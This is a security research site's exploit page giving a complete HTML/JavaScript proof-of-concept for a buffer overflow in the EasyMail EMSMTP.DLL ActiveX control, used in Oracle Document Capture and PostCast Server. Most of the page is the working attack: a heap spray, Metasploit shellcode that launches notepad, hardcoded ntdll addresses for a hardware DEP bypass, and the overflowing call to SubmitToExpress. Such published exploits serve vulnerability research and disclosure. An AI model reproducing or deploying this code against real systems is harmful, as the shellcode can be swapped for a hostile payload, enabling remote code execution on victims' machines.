Services Vulnerabilities Exploits Publications News Blog About DSecRG


[14] Oracle Document Capture (EasyMail Objects EMSMTP.DLL 6.0.1) ActiveX Control BOF - hardware DEP bypass

*CALL-DEP-RET-ActiveX-exploit.html
----------

This is the exploit for QuikSoft EasyMail ActiveX emsmtp.dll (v. 6.0.1)
This DLL is used in :
PostCast PostCast Server Pro 3.0.61
Oracle Document Capture 10.1.3.5

Exploit uses HeapSpray and
CALL [ESI+CC] instruction in emsmtp.dll code for hardware DEP bypass
and return address for taking control over EIP.


# Title: EasyMail Objects EMSMTP.DLL 6.0.1 ActiveX Control BOF (hardware DEP bypass)
# EDB-ID:
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Alexey Sintsov
# Published: 2009-11-12
# Verified: yes
# Download Exploit Code
# Download Vulnerable app

<HTML>
<HEAD>
<TITLE>"][akep": ActiveX CALL-DEP-RET Sploit (Hard-DEP)</TITLE>
</HEAD>
<BODY>

<OBJECT id='vuln' classid='clsid:68AC0D5F-0424-11D5-822F-00C04F6BA8D9'></object>
<!--by Alexey Sintsov from DSecRG [www.dsecrg.com]-->
<!---this sploit use CALL [ESI+CC] for DEP bypass->
<!---and return address for shellcode->
<!--original advisory: http://security-assessment.com/files/advisories/easymail_advisory.pdf -->
<!--rgod is credited with the discovery of this issue.-->
<SCRIPT>

function Exploit(){

//by Metasploit - exec notepad
var shell =
unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u016a%u858d%u00b9%u0000%u6850%u8b31%u876f%ud5ff%ue0bb%u2a1d%u680a%u95a6%u9dbd%ud5ff%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72%u006a%uff53%u6ed5%u746f%u7065%u6461%u0000");

var mem=new Array();
var i=0;

//Heaps with DEP bypass address ntdll.dll
//(XP SP3 - 0x7C91cd26)
//(XP SP2 - 0x7c91d3fa)
var bigbk=unescape("%ud3fa%u7c91");
while(bigbk.length<0x40000) bigbk=bigbk+bigbk;
for(; i<200;i++) mem[i]=bigbk+unescape("%ucd26%u7c91");


//Heaps with shellcode
var bigbk2=unescape("%u9090%u9090%u9090%u9090");
while(bigbk2.length<0x40000) bigbk2=bigbk2+bigbk2;
for(; i<400;i++) mem[i]=bigbk2+shell;

//Shellcode on 0x0D0D0D0D
//DEP bypass addres on 0x050505D4 (0x24 - heap header and 4*X bytes on address)
var bf=unescape("%63");
var buf="";
while (buf.length<260) buf=buf+bf;

buf+=unescape("%08%05%05%05"); //ESI DEP bypass
buf+="ffff"+unescape("%0D%0D%0D%0D"); // Return on shellcode.

vuln.SubmitToExpress(buf);

}
Exploit();
</SCRIPT>
</BODY>
</HTML>

Exploits RSS RSS
03.05.2010
[17] ProSSHD v 1.2. Remote bind shell exploit (w/ASLR and DEP bypass using ROP)

05.03.2010
[16] SAP GUI 7.10 WebViewer3D ActiveX - JIT-Spray Exploit

05.03.2010
[15] Oracle Document Capture (EasyMail Objects EMSMTP.DLL 6.0.1) ActiveX Control BOF - JIT-Spray Exploit

15.02.2010
[14] Oracle Document Capture (EasyMail Objects EMSMTP.DLL 6.0.1) ActiveX Control BOF - hardware DEP bypass

15.02.2010
[13] Oracle Document Capture (EasyMail Objects EMSMTP.DLL 6.0.1) ActiveX Control BOF

18.02.2009
[12] Oracle Database SQL Injection in MDSYS.SDO_TOPO_DROP_FTBL Trigger (metasploit module)

Exploits list


© 2002—2014, ERPScan
For quoting or using materials from this site
link is obligatory

+44 (20) 81334493    e-mail: research@dsecrg.com
Rss: Vulnerabilities, Exploits, News, Publications, Summary
Search